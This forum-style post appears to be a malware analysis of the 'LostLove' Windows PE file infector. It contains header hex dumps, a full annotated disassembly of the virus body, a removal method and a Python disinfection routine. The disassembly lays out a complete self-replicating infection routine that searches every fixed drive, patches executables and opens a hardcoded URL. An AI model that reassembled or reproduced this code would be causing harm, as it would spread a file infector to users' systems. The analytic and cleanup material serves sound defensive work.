I analysed a small virus a while back; posting it here to share:
1. The LostLove virus. It infects Windows PE files whose extension is
EXE or SCR, increasing the file length by 1186 bytes.
When it runs, it searches drives C: through Z: for every matching file and
infects it, and at the same time opens the page http://www.wx-packs.com/lx/boy/boyhacker.htm;
it does no other damage.
2. Infection data
Take the infected C:\WINDOWS\CALC.EXE as an example: the clean file is 94,208 bytes,
the infected one 95,394 bytes.
Before infection:
00 01 02 03 04 05 06 07-08 09 0A 0B 0C 0D 0E 0F 0123456789ABCDEF
0000 4D 5A 90 00 03 00 00 00-04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00-00 00 00 00 C8 00 00 00 ................
00C0 50 45 00 00 4C 01 03 00 PE..L...
00D0 B4 AF FD 34 00 00 00 00-00 00 00 00 E0 00 0F 03 ...4............
00E0 0B 01 05 0C 00 1C 01 00-00 38 00 00 00 00 00 00 .........8......
00F0 E0 19 01 00 00 10 00 00-00 30 01 00 00 00 00 01 .........0......
0100 00 10 00 00 00 10 00 00-05 00 00 00 05 00 00 00 ................
0110 04 00 00 00 00 00 00 00-00 70 01 00 00 06 00 00 .........p......
0120 90 B7 01 00 02 00 00 00-00 00 04 00 00 10 00 00 ................
0130 00 00 10 00 00 10 00 00-00 00 00 00 10 00 00 00 ................
0140 00 00 00 00 00 00 00 00-20 20 01 00 8C 00 00 00 ........ ......
0150 00 40 01 00 18 26 00 00-00 00 00 00 00 00 00 00 .@...&..........
0160 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0170 F0 11 00 00 1C 00 00 00-00 00 00 00 00 00 00 00 ................
0180 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0190 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
01A0 00 10 00 00 E8 01 00 00-00 00 00 00 00 00 00 00 ................
01B0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
01C0 2E 74 65 78 74 00 00 00-0E 1A 01 00 00 10 00 00 .text...........
01D0 00 20 01 00 00 10 00 00-00 00 00 00 00 00 00 00 . ..............
01E0 00 00 00 00 20 00 00 60-2E 64 61 74 61 00 00 00 .... ..`.data...
01F0 84 0F 00 00 00 30 01 00-00 10 00 00 00 30 01 00 .....0.......0..
0200 00 00 00 00 00 00 00 00-00 00 00 00 40 00 00 C0 ............@...
0210 2E 72 73 72 63 00 00 00-18 26 00 00 00 40 01 00 .rsrc....&...@..
0220 00 30 00 00 00 40 01 00-00 00 00 00 00 00 00 00 .0...@..........
0230 00 00 00 00 40 00 00 40-00 00 00 00 00 00 00 00 ....@..@........
0240 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0250 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
After infection (only the changed dwords are listed):
00 01 02 03 04 05 06 07-08 09 0A 0B 0C 0D 0E 0F 0123456789ABCDEF
00F0 00 70 01 00 .p..
0110 00 80 01 00 ....
0120 A2 04 00 00 ....
0210 A2 34 00 00 .4..
0220 A2 34 00 00 .4..
0230 40 00 00 E0 @...
Comparison:
Offset  Before  After
00F0: E0 00
00F1: 19 70
0119: 70 80
0120: 90 A2
0121: B7 04
0122: 01 00
0218: 18 A2
0219: 26 34
0220: 00 A2
0221: 30 34
0237: 40 E0
Here 00F0-00F3 is the program entry address: 000119E0 before infection, 00017000 after.
0118-011B is SizeOfImage (the total size of all sections in memory), increased by 1000.
0120-0123 is the checksum, changed to 4A2.
0218-021B is the VirtualSize of the last section, increased by E8A.
0220-0223 is the raw size (SizeOfRawData) of the last section, increased by 4A2.
0234-0237 are the characteristics of the last section, changed to read, write and execute.
So the virus appends itself after the last section, then patches the entry address and the
corresponding section sizes; the most important thing for cleaning is to restore the
original program entry address.
3. Virus code
Reading out the last 1186 bytes and disassembling them gives the following code:
;************** original program entry ***********************
010119E0 PUSH BP
....
;************** virus entry *************************
01017000 PUSHAD
CALL 01017010
MOV ESP,FS:[0000]
JMP [ESP+28]
01017010 PUSH WORD PTR FS:[0000]
MOV FS:[0000],ESP
MOV EAX,DWORD PTR [ESP+28]
AND AX,F000
MOV ESI,EAX
01017026 SUB ESI,00001000
CMP WORD PTR [ESI],5A4D ;look for 'MZ' (4D5A), the executable file signature
JNE 01017026
MOVZX EDI,WORD PTR [ESI+3C]
ADD EDI,ESI
CMP WORD PTR [EDI],4550 ;look for 'PE' (4550), the PE file signature
JNE 01017026
MOV EBP,DWORD PTR [EDI+78]
ADD EBP,ESI
MOV EBX,DWORD PTR [EBP+20]
ADD EBX,ESI
XOR AX,AX
MOV EDX,ESI
0101704E ADD EBX,00000004
INC EAX
MOV EDI,DWORD PTR [EBX]
ADD EDI,EDX
01017056 CALL 0101706A
0101705B DB 'GetProcAddress',0
0101706A POP ESI
XOR ECX,ECX
MOV CL,0F
CLD
REPZ CMPSB ;look up the export name GetProcAddress
JNE 0101704E
MOV ESI,EDX
MOV EBX,DWORD PTR [EBP+24]
ADD EBX,ESI
MOVZX ECX, WORD PTR [EBX+2*EAX]
MOV EBX,DWORD PTR [EBP+1C]
ADD EBX,ESI
MOV EBX,DWORD PTR [EBX+4*ECX]
ADD EBX,ESI
SUB ESP,00000060
MOV EDI,ESP
CALL 0101709F
01017093 DB 'ExitProcess',0
0101709F CALL 010170BB
010170A4 DB 'RegisterServiceProcess',0
010170BB CALL 010170C6
010170C0 DB 'Sleep',0
010170C6 CALL 010170D3
010170CB DB '_lclose',0
010170D3 CALL 010170E0
010170D8 DB '_llseek',0
010170E0 CALL 010170ED
010170E5 DB '_lwrite',0
010170ED CALL 010170F9
010170F2 DB '_lread',0
010170F9 CALL 01017105
010170FE DB '_lopen',0
01017105 CALL 01017116
0101710A DB 'SetFileTime',0
01017116 CALL 0101712E
0101711B DB 'SetFileAttributesA',0
0101712E CALL 0101713D
01017133 DB 'FindClose',0
0101713D CALL 01017150
01017142 DB 'FindNextFileA',0
01017150 CALL 01017164
01017155 DB 'FindFirstFileA',0
01017164 CALL 0101717E
01017169 DB 'SetCurrentDirectoryA',0
0101717E CALL 01017191
01017183 DB 'GetDriveTypeA',0
01017191 CALL 0101719E
01017196 DB 'WinExec',0
0101719E CALL 010171B3
010171A3 DB 'GetCommandLineA',0
010171B3 CALL 010171C5
010171B8 DB 'GetLastError',0
010171C5 CALL 010171D7
010171CA DB 'CreateMutexA',0
010171D7 CALL 010171E9
010171DC DB 'LoadLibraryA',0
010171E9 MOV ECX,00000014
010171EE MOV EBP,ECX
PUSH ESI
CALL EBX ;call GetProcAddress
CLD
STOSD
MOV ECX,EBP
LOOP 010171EE ;resolve the entry addresses of the functions it needs
MOV ESI,ESP ;they are the 20 names above; ESI now points at the address table
CALL 01017209
01017200 DB 'LostLove',0 ;virus marker
01017209 PUSH 0
PUSH 0
CALL [ESI+4] ;CreateMutexA
CALL [ESI+8] ;GetLastError
OR EAX,EAX
01017215 JE 0101722B ;success: the virus is not yet resident, go to the virus body
01017217 MOV ESP,FS:[0000]
POP WORD PTR FS:[0000]
POP EAX
POPAD
01017225 PUSH 010119E0
0101722A RET ;return to the original program
;---------------------------------------
0101722B CALL [ESI+0C] ;GetCommandLineA
PUSH 00000001
PUSH EAX
CALL [ESI+10] ;WinExec 'Command Line'
MOV EAX,DWORD PTR [ESI+48]
OR EAX,EAX
JE 01017241
0101723B PUSH 00000001
PUSH 00000000
CALL EAX ;RegisterServiceProcess
01017241 CALL 01017289
01017246 PUSH 00000001
CALL 01017283
0101724D DB 'Explorer http://www.wx-packs.com/lx/boy/boyhacker.htm',0
01017283 CALL [ESI+10] ;WinExec
CALL [ESI+4C] ;ExitProcess
01017289 MOV ECX,00000018
MOV EDX,005C3A43 ;'C:\'
01017293 PUSH ECX
PUSH EDX
PUSH ESP
CALL [ESI+14] ;GetDriveTypeA
CMP EAX,2
JB 010172A9 ;only fixed disks are searched
CMP EAX,5 ;CD-ROM and floppy drives are of no interest
010172A1 JE 010172A9
PUSH ESP
CALL 010172AF
010172A9 POP EDX
INC EDX
POP ECX
LOOP 01017293
RET
010172AF ENTER 0000,00
PUSH EBX
PUSH ESI
PUSH EDI
PUSH [EBP+08]
CALL [ESI+18] ;SetCurrentDirectoryA
OR EAX,EAX
JE 0101731B ;error
SUB ESP,00001000
MOV DWORD PTR [ESP],002A2E2A ;'*.*'
MOV EAX,ESP
PUSH ESP
PUSH EAX
CALL [ESI+1C] ;FindFirstFileA
MOV EBX,EAX
CMP EAX,FFFFFFFF
JE 0101730A
PUSH ESP
PUSH EBX
CALL [ESI+20] ;FindNextFileA
OR EAX,EAX
JE 01017306
LEA EDX,DWORD PTR [ESP+2C]
MOV EAX,DWORD PTR [ESP]
AND EAX,00000010
JE 010172FE
MOV EAX,DWORD PTR[EDX]
CMP AL,2E
JE 010172DB
PUSH EDX
CALL 010172AF
JMP 010172DB
010172FE PUSH ESP
CALL 01017322
JMP 010172DB
01017306 PUSH EBX
CALL [ESI+24] ;FindClose
0101730A MOV DWORD PTR [ESP],00002E2E
PUSH ESP
CALL [ESI+18] ;SetCurrentDirectoryA
ADD ESP,00001000
0101731B POP EDI
POP ESI
POP EBX
LEAVE
RET 0004
01017322 ENTER 0000,00
PUSH EBX
PUSH ESI
PUSH EDI
MOV EBX,DWORD PTR [EBP+8]
MOV ECX,00001000
LEA EDI,DWORD PTR [EBX+2C]
XOR AL,AL
CLD
REPNZ SCASB ;find the end of the file name to get the extension
MOV EAX,DWORD PTR [EDI-05]
OR EAX,20202000
CMP EAX,6578652E ;'.exe'
JE 01017356
CMP EAX,7263732E ;'.scr'
JE 01017356
POP EDI
POP ESI
POP EBX
LEAVE
RET 0004
01017356 PUSH EBX
CALL 01017363
POP EDI
POP ESI
POP EBX
LEAVE
RET 0004
;**************** the infection routine is here *******************************
01017363 ENTER 0000,00
PUSH EBX
PUSH ESI
PUSH EDI
MOV EDI,DWORD PTR [EBP+08]
LEA EBX,DWORD PTR [EDI+2C]
PUSH 00000000
PUSH EBX
CALL [ESI+28] ;SetFileAttributesA
PUSH 00000002 ;read/write mode
PUSH EBX
CALL [ESI+30] ;_lopen, open the file
CMP EAX,FFFFFFFF
JE 0101739D ;error
MOV EBX,EAX
PUSH EBX
CALL 010173AD
LEA EAX,DWORD PTR [EDI+04]
LEA ECX,DWORD PTR [EDI+0C]
LEA EDX,DWORD PTR [EDI+14]
PUSH EDX
PUSH ECX
PUSH EAX
PUSH EBX
CALL [ESI+2C] ;SetFileTime, so that is why the file date does not change
PUSH EBX
CALL [ESI+40] ;_lclose
0101739D LEA EBX,DWORD PTR [EDI+2C]
PUSH DWORD PTR [EDI]
PUSH EBX
CALL [ESI+28] ;SetFileAttributesA
POP EDI
POP ESI
POP EBX
LEAVE
RET 0004
010173AD ENTER 0000,00
PUSH EBX
PUSH ESI
PUSH EDI
SUB ESP,00001000
MOV EDI,ESP
PUSH 00001000 ;read 4096 bytes
PUSH EDI ;buffer address
PUSH [EBP+08] ;file handle
CALL [ESI+34] ;_lread
MOVZX EAX,WORD PTR [EDI+3C]
ADD EDI,EAX
CMP EDI,EBP
JA 01017495
CMP WORD PTR [EDI],4550 ;is it really a PE file?
JNE 01017495
MOV EAX,000004A2
XCHG DWORD PTR [EDI+58],EAX
CMP EAX,000004A2 ;was the checksum already 4A2, i.e. already infected? see below
JE 01017495
LEA EBX,DWORD PTR [EDI+000000F8] ;address of the first section header
MOVZX ECX,WORD PTR [EDI+6] ;number of sections
DEC ECX
010173FF ADD EBX,00000028
LOOP 010173FF ;find the last section header
CMP EBX,EBP
JA 01017495
OR DWORD PTR [EBX+24],E0000000 ;modify its characteristics
PUSH 00000002 ;seek from end of file
PUSH 00000000 ;
PUSH [EBP+8]
CALL [ESI+3C] ;_llseek
CMP EAX,FFFFFFFF
JE 01017495
PUSH EAX
ADD EAX,000004A2
SUB EAX,DWORD PTR [EBX+14]
MOV DWORD PTR [EBX+10],EAX ;raw size (SizeOfRawData) of the last section
MOV EDX,DWORD PTR [EBX+8]
CMP EAX,EDX
JB 0101744B
MOV DWORD PTR [EBX+8],EAX
MOV ECX,DWORD PTR [EDI+38]
DEC CX
ADD EAX,ECX
ADD EDX,ECX
NOT ECX
AND EAX,ECX
AND EDX,ECX
SUB EAX,EDX
ADD DWORD PTR [EDI+50],EAX ;SizeOfImage
0101744B POP ECX
SUB ECX,DWORD PTR [EBX+14] ;PointerToRawData
ADD ECX,DWORD PTR [EBX+0C] ;VirtualAddress
XCHG DWORD PTR [EDI+28],ECX ; !!!!! patch the entry address !!!!!
ADD ECX,DWORD PTR [EDI+34] ; original entry address plus ImageBase goes into ECX
CALL 0101745D
0101745D POP EDI
SUB EDI,00000237
MOV DWORD PTR [EDI],ECX ;ECX is stored here, as the operand of PUSH 010119E0 at 01017225
SUB EDI,00000226
PUSH 000004A2
PUSH EDI
PUSH [EBP+08]
CALL [ESI+38] ;_lwrite
CMP EAX,FFFFFFFF
JE 01017495
PUSH 00000000 ;seek to start of file
PUSH 00000000
PUSH [EBP+08]
CALL [ESI+3C] ;_llseek
MOV EAX,ESP
PUSH 00001000
PUSH EAX
PUSH [EBP+08]
CALL [ESI+38] ;_hwrite
01017495 ADD ESP,00001000
POP EDI
POP ESI
POP EBX
LEAVE
RET 0004
4. Removal method:
The removal method follows directly from the program above: take the dword located 027C-0279 bytes
before the end of the file (the operand of the PUSH at 01017225) and subtract ImageBase from it;
the result is the original entry address.
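As an added example (not code from the original post), the header comparison in section 2 and the recovery rule in section 4 turned into a check-and-clean routine; build_sample() is a constructed stand-in for the infected CALC.EXE using only the header values from the dump above, and the "not computed" checksum of 0 is an assumption since the original checksum is overwritten:

```python
import struct
VIRUS_LEN = 0x4A2         # LostLove appends exactly 1186 bytes after the last section
MARKER_CHECKSUM = 0x4A2   # it overwrites OptionalHeader.CheckSum with 4A2 as an "already infected" flag
EP_SLOT_FROM_END = 0x27C  # original entry VA (RVA + ImageBase) sits 0x27C bytes before end of file
SEC_RWX = 0xE0000000      # characteristics the virus ORs into the last section header

def pe_layout(data):
    """Locate the fields the analysis relies on; section headers follow SizeOfOptionalHeader, not a fixed +F8."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec, opt_size = struct.unpack_from("<H12xH", data, pe + 6)
    opt = pe + 24
    entry, base, checksum = (struct.unpack_from("<I", data, opt + o)[0] for o in (0x10, 0x1C, 0x40))
    last = opt + opt_size + (nsec - 1) * 0x28          # header of the last section
    vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, last + 8)
    chars = struct.unpack_from("<I", data, last + 0x24)[0]
    return dict(opt=opt, entry=entry, base=base, checksum=checksum, last=last,
                vsize=vsize, va=va, rawsize=rawsize, rawptr=rawptr, chars=chars)

def is_infected(data):
    """All four markers seen in the before/after comparison must agree before a file is called infected."""
    h = pe_layout(data)
    entry_in_last = h["va"] <= h["entry"] < h["va"] + max(h["vsize"], h["rawsize"])
    return (h["checksum"] == MARKER_CHECKSUM and entry_in_last
            and h["chars"] & SEC_RWX == SEC_RWX and b"LostLove" in data[-VIRUS_LEN:])

def disinfect(data):
    """Inverse of the routine at 010173AD: returns (cleaned image, original entry RVA)."""
    h = pe_layout(data)
    orig_rva = struct.unpack_from("<I", data, len(data) - EP_SLOT_FROM_END)[0] - h["base"]
    out = bytearray(data[:-VIRUS_LEN])                 # drop the appended body
    struct.pack_into("<I", out, h["opt"] + 0x10, orig_rva)
    struct.pack_into("<I", out, h["last"] + 0x10, h["rawsize"] - VIRUS_LEN)
    struct.pack_into("<I", out, h["opt"] + 0x40, 0)    # assumption: original checksum is lost, 0 = "not computed"
    return bytes(out), orig_rva

def build_sample():
    """Constructed stand-in for the infected CALC.EXE, header values taken from the dump above."""
    img = bytearray(95394)
    img[:2], img[0xC8:0xCC] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", img, 0x3C, 0xC8)                                   # e_lfanew = C8
    struct.pack_into("<H12xH", img, 0xCE, 3, 0xE0)                            # 3 sections, 0xE0 optional header
    struct.pack_into("<IIII", img, 0xF0, 0x17000, 0x1000, 0x13000, 0x01000000)  # entry, code, data, ImageBase
    struct.pack_into("<III", img, 0x118, 0x18000, 0x600, 0x4A2)               # SizeOfImage, SizeOfHeaders, CheckSum
    struct.pack_into("<IIII", img, 0x218, 0x34A2, 0x14000, 0x34A2, 0x14000)   # last section: vsize, va, raw, ptr
    struct.pack_into("<I", img, 0x234, 0xE0000040)                            # characteristics after infection
    img[0x17200:0x17209] = b"LostLove\0"                                      # 0x200 into the body, as in the listing
    struct.pack_into("<I", img, 0x17226, 0x010119E0)                          # slot the PUSH at 01017225 reads
    return bytes(img)
```

The enlarged VirtualSize and SizeOfImage cannot be recovered from the infected file and are left as they are, which does not stop the cleaned file from loading.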